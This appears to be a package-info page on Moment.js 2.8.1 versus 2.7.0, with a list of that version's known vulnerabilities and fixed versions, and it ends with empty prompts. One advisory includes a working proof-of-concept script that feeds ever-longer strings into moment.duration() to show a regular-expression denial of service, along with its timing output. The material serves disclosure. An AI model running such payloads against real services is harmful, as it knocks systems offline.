Moment.js version 2.8.1 builds upon the solid foundation of version 2.7.0, offering refinements and additions to this popular JavaScript date manipulation library. Both versions provide developers with powerful tools for parsing, validating, manipulating, and formatting dates, suitable for a wide range of applications, from simple date displays to complex calendar systems. Key functionalities like date arithmetic, timezone handling (with the Moment Timezone add-on), and internationalization are central to both releases.
The shift from 2.7.0 to 2.8.1 introduces a few notable enhancements. Although the core functionality remains consistent, developers might be interested in the updated development dependencies in version 2.8.1, which includes packages like grunt-benchmark, grunt-jscs, karma-chrome-launcher. Also, the package grunt-benchmark is a new one in version 2.8.1 showing an effort to improve the quality of the software through benchmarks. While these are primarily for development and testing purposes, they can reflect indirectly improved efficiency and code quality. The release date difference indicates active maintenance and iterative improvement within the Moment.js project. Developers already using Moment.js will find the upgrade straightforward, while new users will benefit from a mature and actively maintained library. Ultimately, both versions empower developers to manage dates effectively within their JavaScript projects.
All the vulnerabilities related to the version 2.8.1 of the package
Regular Expression Denial of Service in moment
Versions of moment prior to 2.11.2 are affected by a regular expression denial of service vulnerability. The vulnerability is triggered when arbitrary user input is passed into moment.duration().
var moment = require('moment');
var genstr = function (len, chr) {
var result = "";
for (i=0; i<=len; i++) {
result = result + chr;
}
return result;
}
for (i=20000;i<=10000000;i=i+10000) {
console.log("COUNT: " + i);
var str = '-' + genstr(i, '1')
console.log("LENGTH: " + str.length);
var start = process.hrtime();
moment.duration(str)
var end = process.hrtime(start);
console.log(end);
}
$ node moment.js
COUNT: 20000
LENGTH: 20002
[ 0, 618931029 ]
COUNT: 30001
LENGTH: 30003
[ 1, 401413894 ]
COUNT: 40002
LENGTH: 40004
[ 2, 437075303 ]
COUNT: 50003
LENGTH: 50005
[ 3, 824664804 ]
COUNT: 60004
LENGTH: 60006
[ 5, 651335262 ]
Please update to version 2.11.2 or later.
Regular Expression Denial of Service in moment
Affected versions of moment are vulnerable to a low severity regular expression denial of service when parsing dates as strings.
Update to version 2.19.3 or later.
Path Traversal: 'dir/../../filename' in moment.locale
This vulnerability impacts npm (server) users of moment.js, especially if user provided locale string, eg fr is directly used to switch moment locale.
This problem is patched in 2.29.2, and the patch can be applied to all affected versions (from 1.0.1 up until 2.29.1, inclusive).
Sanitize user-provided locale name before passing it to moment.js.
Are there any links users can visit to find out more?
If you have any questions or comments about this advisory: